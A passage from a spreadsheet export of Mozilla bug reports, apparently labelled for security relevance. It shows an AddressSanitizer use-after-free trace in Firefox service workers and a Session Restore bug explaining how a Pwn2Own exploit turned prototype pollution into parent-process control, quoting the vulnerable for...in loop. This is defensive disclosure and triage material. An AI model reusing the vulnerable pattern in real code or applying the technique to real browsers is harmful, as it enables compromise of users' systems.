    #3 0x7f0b32eb6c2f in nsTHashtable&lt;nsBaseHashtableET&lt;nsCStringHashKey, nsAutoPtr&lt;nsTArray&lt;nsIInterceptedChannel*&gt; &gt; &gt; &gt;::s_HashKey(PLDHashTable*, void const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsTHashtable.h:375
    #4 0x7f0b2d56f809 in ComputeKeyHash /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/PLDHashTable.cpp:504
    #5 0x7f0b2d56f809 in PLDHashTable::Add(void const*, mozilla::fallible_t const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/PLDHashTable.cpp:573
    #6 0x7f0b2d56fdbe in PLDHashTable::Add(void const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/PLDHashTable.cpp:594
    #7 0x7f0b32e3366f in PutEntry /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsTHashtable.h:153
    #8 0x7f0b32e3366f in LookupOrAdd /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsClassHashtable.h:79
    #9 0x7f0b32e3366f in mozilla::dom::workers::ServiceWorkerManager::AddNavigationInterception(nsACString_internal const&amp;, nsIInterceptedChannel*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/ServiceWorkerManager.cpp:4925
    #10 0x7f0b32e328f7 in mozilla::dom::workers::ServiceWorkerManager::DispatchFetchEvent(mozilla::PrincipalOriginAttributes const&amp;, nsIDocument*, nsAString_internal const&amp;, nsIInterceptedChannel*, bool, bool, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/ServiceWorkerManager.cpp:3698
    #11 0x7f0b3497cab5 in nsDocShell::ChannelIntercepted(nsIInterceptedChannel*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:14266
    #12 0x7f0b2daf9b36 in DoNotifyController /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/protocol/http/InterceptedChannel.cpp:76
    #13 0x7f0b2daf9b36 in mozilla::net::InterceptedChannelChrome::NotifyController() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/protocol/http/InterceptedChannel.cpp:170
    #14 0x7f0b2db84bcf in mozilla::net::nsHttpChannel::OpenCacheEntry(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/protocol/http/nsHttpChannel.cpp:3034
    #15 0x7f0b2db81e27 in mozilla::net::nsHttpChannel::Connect() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/protocol/http/nsHttpChannel.cpp:357
    #16 0x7f0b2dbbd9ae in mozilla::net::nsHttpChannel::ContinueBeginConnectWithResult() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/protocol/http/nsHttpChannel.cpp:5482
    #17 0x7f0b2dbbc13f in mozilla::net::nsHttpChannel::BeginConnect() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/protocol/http/nsHttpChannel.cpp:5385
    #18 0x7f0b2dbbee32 in mozilla::net::nsHttpChannel::OnProxyAvailable(nsICancelable*, nsIChannel*, nsIProxyInfo*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/protocol/http/nsHttpChannel.cpp:5552
    #19 0x7f0b2d721cfc in nsAsyncResolveRequest::DoCallback() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/base/nsProtocolProxyService.cpp:277
    #20 0x7f0b2d712038 in Run /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/base/nsProtocolProxyService.cpp:159
    #21 0x7f0b2d712038 in nsProtocolProxyService::AsyncResolveInternal(nsIChannel*, unsigned int, nsIProtocolProxyCallback*, nsICancelable**, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/base/nsProtocolProxyService.cpp:1294
    #22 0x7f0b2dba52f5 in mozilla::net::nsHttpChannel::ResolveProxy() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/protocol/http/nsHttpChannel.cpp:2200
    #23 0x7f0b2dbb8256 in mozilla::net::nsHttpChannel::AsyncOpen(nsIStreamListener*, nsISupports*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/protocol/http/nsHttpChannel.cpp:5092
    #24 0x7f0b2ef33d14 in nsURILoader::OpenURI(nsIChannel*, unsigned int, nsIInterfaceRequestor*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsURILoader.cpp:825
    #25 0x7f0b34909997 in nsDocShell::DoChannelLoad(nsIChannel*, nsIURILoader*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:11058
    #26 0x7f0b34963709 in nsDocShell::DoURILoad(nsIURI*, nsIURI*, bool, nsIURI*, bool, unsigned int, nsISupports*, char const*, nsAString_internal const&amp;, nsIInputStream*, nsIInputStream*, bool, nsIDocShell**, nsIRequest**, bool, bool, bool, nsAString_internal const&amp;, nsIURI*, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:10872
    #27 0x7f0b349083ba in nsDocShell::InternalLoad(nsIURI*, nsIURI*, bool, nsIURI*, unsigned int, nsISupports*, unsigned int, char16_t const*, char const*, nsAString_internal const&amp;, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsAString_internal const&amp;, nsIDocShell*, nsIURI*, nsIDocShell**, nsIRequest**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:10389
    #28 0x7f0b3490027e in nsDocShell::LoadHistoryEntry(nsISHEntry*, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:12175
    #29 0x7f0b34933278 in nsDocShell::Reload(unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:5330
    #30 0x7f0b2fe0594a in nsLocation::Reload(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsLocation.cpp:887
    #31 0x7f0b303eac98 in Reload /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsLocation.h:67
    #32 0x7f0b303eac98 in mozilla::dom::LocationBinding::reload(JSContext*, JS::Handle&lt;JSObject*&gt;, nsLocation*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/LocationBinding.cpp:745
    #33 0x7f0b3197eb56 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/bindings/BindingUtils.cpp:2731
    #34 0x7f0b376ed3e9 in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:235
    #35 0x7f0b376ed3e9 in js::Invoke(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:478
    #36 0x7f0b376d89b2 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2802
    #37 0x7f0b376b98ee in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:428
    #38 0x7f0b376ed9d4 in js::Invoke(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:496
    #39 0x7f0b376ee3d4 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:530
    #40 0x7f0b371e49ef in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:2892
    #41 0x7f0b31605372 in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36
    #42 0x7f0b2f9feae8 in Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:58
    #43 0x7f0b2f9feae8 in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsGlobalWindow.cpp:11933
    #44 0x7f0b2f9dde8f in nsGlobalWindow::RunTimeout(nsTimeout*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsGlobalWindow.cpp:12168
    #45 0x7f0b2f97dd51 in nsGlobalWindow::TimerCallback(nsITimer*, void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsGlobalWindow.cpp:12414
    #46 0x7f0b2d530bb5 in nsTimerImpl::Fire() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsTimerImpl.cpp:526
    #47 0x7f0b2d50b025 in nsTimerEvent::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/TimerThread.cpp:286
    #48 0x7f0b2d517440 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1018
    #49 0x7f0b2d590bca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:297
    #50 0x7f0b2df32f39 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:95
    #51 0x7f0b2de9a0ac in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #52 0x7f0b2de9a0ac in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #53 0x7f0b2de9a0ac in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #54 0x7f0b333a66b7 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156
    #55 0x7f0b3521d008 in nsAppStartup::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/components/startup/nsAppStartup.cpp:281
    #56 0x7f0b3531324a in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4281
    #57 0x7f0b353144b6 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4378
    #58 0x7f0b353152fe in XRE_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4480
    #59 0x48a793 in do_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:220
    #60 0x48a793 in main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:360
    #61 0x7f0b46799ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #62 0x489bcc in _start (/home/parnell/FirefoxBuilds/firefox/firefox+0x489bcc)
0x60b00080aea8 is located 40 bytes inside of 104-byte region [0x60b00080ae80,0x60b00080aee8)
freed by thread T0 here:
    #0 0x471fe1 in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x7f0b32eb8c5f in Release /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/ServiceWorkerManager.cpp:453
    #2 0x7f0b32eb8c5f in Release /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:39
    #3 0x7f0b32eb8c5f in Release /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:377
    #4 0x7f0b32eb8c5f in assign_assuming_AddRef /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:64
    #5 0x7f0b32eb8c5f in assign_with_AddRef /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:55
    #6 0x7f0b32eb8c5f in operator= /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:174
    #7 0x7f0b32eb8c5f in mozilla::dom::workers::ServiceWorkerJobBase::EnsureAndVerifyRegistration() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/ServiceWorkerManager.cpp:997
    #8 0x7f0b32e196a1 in mozilla::dom::workers::ServiceWorkerInstallJob::ContinueAfterInstallEvent(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/ServiceWorkerManager.cpp:1201
    #9 0x7f0b32ee62c8 in mozilla::dom::workers::ContinueLifecycleRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/ServiceWorkerManager.cpp:689
    #10 0x7f0b2d517440 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1018
    #11 0x7f0b2d590bca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:297
    #12 0x7f0b2df32f39 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:95
    #13 0x7f0b2de9a0ac in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #14 0x7f0b2de9a0ac in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #15 0x7f0b2de9a0ac in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #16 0x7f0b333a66b7 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156
    #17 0x7f0b3521d008 in nsAppStartup::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/components/startup/nsAppStartup.cpp:281
    #18 0x7f0b3531324a in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4281
    #19 0x7f0b353144b6 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4378
    #20 0x7f0b353152fe in XRE_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4480
    #21 0x48a793 in do_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:220
    #22 0x48a793 in main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:360
    #23 0x7f0b46799ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
previously allocated by thread T0 here:
    #0 0x4721e1 in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x48b8dd in moz_xmalloc /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/memory/mozalloc/mozalloc.cpp:83
    #2 0x7f0b32eac69d in operator new /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:186
    #3 0x7f0b32eac69d in operator nsIPrincipal * /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/ServiceWorkerManager.cpp:4304
    #4 0x7f0b32eac69d in mozilla::dom::workers::ServiceWorkerRegisterJob::Start() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/ServiceWorkerManager.cpp:1335
    #5 0x7f0b32ee9408 in mozilla::dom::workers::ServiceWorkerJobQueue::Pop(mozilla::dom::workers::ServiceWorkerJobQueue::QueueData&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/ServiceWorkerManager.cpp:292
    #6 0x7f0b32ee20b0 in apply&lt;mozilla::dom::workers::ServiceWorkerUnregisterJob, void (mozilla::dom::workers::ServiceWorkerUnregisterJob::*)()&gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:663
    #7 0x7f0b32ee20b0 in nsRunnableMethodImpl&lt;void (mozilla::dom::workers::ServiceWorkerUnregisterJob::*)(), true&gt;::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:870
    #8 0x7f0b2d517440 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1018
    #9 0x7f0b2d590bca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:297
    #10 0x7f0b2df32f39 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:95
    #11 0x7f0b2de9a0ac in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #12 0x7f0b2de9a0ac in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #13 0x7f0b2de9a0ac in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #14 0x7f0b333a66b7 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156
    #15 0x7f0b3521d008 in nsAppStartup::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/components/startup/nsAppStartup.cpp:281
    #16 0x7f0b3531324a in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4281
    #17 0x7f0b353144b6 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4378
    #18 0x7f0b353152fe in XRE_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4480
    #19 0x48a793 in do_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:220
    #20 0x48a793 in main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:360
    #21 0x7f0b46799ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsTSubstring.h:104 BeginReading
Shadow bytes around the buggy address:
  0x0c16800f9580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c16800f9590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c16800f95a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c16800f95b0: fd fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00
  0x0c16800f95c0: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
=&gt;0x0c16800f95d0: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fa fa fa
  0x0c16800f95e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c16800f95f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c16800f9600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c16800f9610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c16800f9620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      =5198==ABORTING</t>
        </is>
      </c>
      <c r="X1639" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1640">
      <c r="A1640" t="n">
        <v>1771381</v>
      </c>
      <c r="B1640" t="inlineStr">
        <is>
          <t>2022-05-26 14:14:39 -0700</t>
        </is>
      </c>
      <c r="C1640" t="inlineStr">
        <is>
          <t>Don't copy attributes from the prototype</t>
        </is>
      </c>
      <c r="D1640" t="inlineStr">
        <is>
          <t>2023-01-16 20:32:20 -0800</t>
        </is>
      </c>
      <c r="E1640" t="n">
        <v>1</v>
      </c>
      <c r="F1640" t="n">
        <v>1</v>
      </c>
      <c r="G1640" t="n">
        <v>2</v>
      </c>
      <c r="H1640" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1640" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1640" t="inlineStr">
        <is>
          <t>Session Restore</t>
        </is>
      </c>
      <c r="K1640" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1640" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1640" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1640" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1640" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1640" t="inlineStr">
        <is>
          <t>[adv-main102+r][adv-esr91.11+r]</t>
        </is>
      </c>
      <c r="Q1640" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1640" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1640" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T1640" t="n">
        <v>1</v>
      </c>
      <c r="U1640" t="n">
        <v>0</v>
      </c>
      <c r="V1640" t="n">
        <v>24</v>
      </c>
      <c r="W1640" t="inlineStr">
        <is>
          <t>One of the later phases of the Pwn2Own exploit, described in section 3.6 of the writeup, involves session store. By this point, the exploit has managed to contaminate Object.prototype in the JSM compartment by setting an attacker controlled attribute to an attacker controlled value (that was structured cloned).
They were able to leverage this into further control of the parent process because of the code [here](https://searchfox.org/mozilla-central/rev/301e9545863b14ff85aa110fabd4274da4593f9d/browser/components/sessionstore/TabAttributes.jsm#70-74):
```js
    for (let name in data) {
      if (!ATTRIBUTES_TO_SKIP.has(name)) {
        tab.setAttribute(name, data[name]);
      }
    }
```
This iterates over all of the properties of data, which is yet another Object being used as a map. This kind of for ... in iterates over properties on the prototype, too, so the attacker's values are copied onto the tab being restored, causing further badness.
There's no actual reason we want to copy properties from anything further up the prototype chain, so we could iterate over `Object.entries(data)` instead of `data`. I looked a bit into changing data to a Map, but it looks like it might come from JSON we're storing somewhere so it didn't seem easy to change. (Another place kmag's idea about parsing into JSON without a prototype might have helped.)</t>
        </is>
      </c>
      <c r="X1640" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1641">
      <c r="A1641" t="n">
        <v>1393277</v>
      </c>
      <c r="B1641" t="inlineStr">
        <is>
          <t>2017-08-23 16:09:22 -0700</t>
        </is>
      </c>
      <c r="C1641" t="inlineStr">
        <is>
          <t>cot-verifiable action tasks</t>
        </is>
      </c>
      <c r="D1641" t="inlineStr">
        <is>
          <t>2018-03-02 12:18:08 -0800</t>
        </is>
      </c>
      <c r="E1641" t="n">
        <v>1</v>
      </c>
      <c r="F1641" t="n">
        <v>1</v>
      </c>
      <c r="G1641" t="n">
        <v>7</v>
      </c>
      <c r="H1641" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1641" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J1641" t="inlineStr">
        <is>
          <t>Task Configuration</t>
        </is>
      </c>
      <c r="K1641" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1641" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1641" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1641" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1641" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1641" t="inlineStr"/>
      <c r="Q1641" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1641" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1641" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T1641" t="n">
        <v>1</v>
      </c>
      <c r="U1641" t="n">
        <v>0</v>
      </c>
      <c r="V1641" t="n">
        <v>47</v>
      </c>
      <c r="W1641" t="inlineStr">
        <is>
          <t>What:
The ability to generate a subgraph of the target task graph, and use a previous graph's tasks as kind-dependencies.
E.g., generate a subgraph containing build-signing-win64-nightly/opt and all children. All of build-signing-win64-nightly/opt's dependencies' taskIds are pulled from another decision task's graph, by label.
Why:
- We regularly need to resubmit partial graphs because the breakpoint task hasn't been resolved before the deadline.
- we need to be able to retrigger failed tasks without breaking CoT.
- this would allow us to port release graphs in-tree gradually over time (i.e., one segment is in-tree; another segment is still in releasetasks templates) instead of forcing us to port everything at once.
- in the future, this may allow for splitting 3000+ task nightly graphs into discrete graphs that depend on each other. (A status graph could potentially depend on each of the child graphs for meta-graph status.) Splitting by platform makes a lot of sense.
I'm currently looking at how feasible this is, since this hypothetical feature has come up quite a bit as a potential solution to our problems.</t>
        </is>
      </c>
      <c r="X1641" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1642">
      <c r="A1642" t="n">
        <v>685612</v>
      </c>
      <c r="B1642" t="inlineStr">
        <is>
          <t>2011-09-08 11:19:08 -0700</t>
        </is>
      </c>
      <c r="C1642" t="inlineStr">
        <is>
          <t>Socorro staging is down: error: [5xx Error] File: application/libraries/MY_QueryFormHelper.php; Line: 101; Message: array_push() expects parameter 1 to be array, null given</t>
        </is>
      </c>
      <c r="D1642" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E1642" t="n">
        <v>1</v>
      </c>
      <c r="F1642" t="n">
        <v>1</v>
      </c>
      <c r="G1642" t="n">
        <v>4</v>
      </c>
      <c r="H1642" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1642" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1642" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1642" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1642" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1642" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1642" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1642" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1642" t="inlineStr"/>
      <c r="Q1642" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1642" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1642" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1642" t="n">
        <v>1</v>
      </c>
      <c r="U1642" t="n">
        <v>0</v>
      </c>
      <c r="V1642" t="n">
        <v>6</v>
      </c>
      <c r="W1642" t="inlineStr">
        <is>
          <t>Socorro staging is down: https://crash-stats.allizom.org:
error: [5xx Error] File: application/libraries/MY_QueryFormHelper.php; Line: 101; Message: array_push() expects parameter 1 to be array, null given</t>
        </is>
      </c>
      <c r="X1642" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1643">
      <c r="A1643" t="n">
        <v>977538</v>
      </c>
      <c r="B1643" t="inlineStr">
        <is>
          <t>2014-02-27 04:10:15 -0800</t>
        </is>
      </c>
      <c r="C1643" t="inlineStr">
        <is>
          <t>MSVC with PGO still miscompiles/nops CanonicalizeNaN</t>
        </is>
      </c>
      <c r="D1643" t="inlineStr">
        <is>
          <t>2018-03-15 03:19:56 -0700</t>
        </is>
      </c>
      <c r="E1643" t="n">
        <v>1</v>
      </c>
